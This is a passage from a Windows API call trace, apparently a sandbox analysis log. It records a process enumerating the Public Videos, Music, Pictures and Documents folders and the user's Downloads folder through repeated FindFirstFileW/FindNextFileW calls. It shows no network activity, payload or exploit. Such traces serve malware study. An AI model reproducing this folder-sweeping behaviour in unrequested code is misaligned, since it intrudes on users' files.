dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0122.650] GetLastError () returned 0x12 [0122.650] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.651] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.652] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.652] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.652] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.652] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0122.652] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0122.652] GetLastError () returned 0x12 [0122.652] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.653] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=55, fCreate=0 | out: pszPath="C:\\Users\\Public\\Videos") returned 1 [0122.657] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0122.657] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=55, fCreate=0 | out: pszPath="C:\\Users\\Public\\Videos") returned 1 [0122.657] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.657] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.657] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.657] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.657] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.657] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.657] GetLastError () returned 0x12 [0122.657] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.657] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.657] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.657] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.657] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.658] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.658] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.658] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.658] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.658] GetLastError () returned 0x12 [0122.658] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.658] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=53, fCreate=0 | out: pszPath="C:\\Users\\Public\\Music") returned 1 [0122.659] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Music" (normalized: "c:\\users\\public\\music")) returned 0x11 [0122.659] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=53, fCreate=0 | out: pszPath="C:\\Users\\Public\\Music") returned 1 [0122.659] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.659] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.659] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.659] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.659] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.659] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.659] GetLastError () returned 0x12 [0122.659] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.660] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.660] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.660] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.660] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.660] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.660] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.660] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.660] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.660] GetLastError () returned 0x12 [0122.660] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.660] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=54, fCreate=0 | out: pszPath="C:\\Users\\Public\\Pictures") returned 1 [0122.662] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0122.662] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=54, fCreate=0 | out: pszPath="C:\\Users\\Public\\Pictures") returned 1 [0122.662] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.662] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.662] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.662] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.662] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.662] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.662] GetLastError () returned 0x12 [0122.663] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.663] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.663] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.663] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.663] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.663] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.663] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.663] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.663] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.663] GetLastError () returned 0x12 [0122.663] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.663] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x19f53c, nSize=0x400 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.663] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0122.663] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x19f53c, nSize=0x400 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.663] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0122.663] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.663] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.663] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0122.663] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.664] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.664] GetLastError () returned 0x12 [0122.664] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0122.664] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*.*", lpFindFileData=0x19fae8 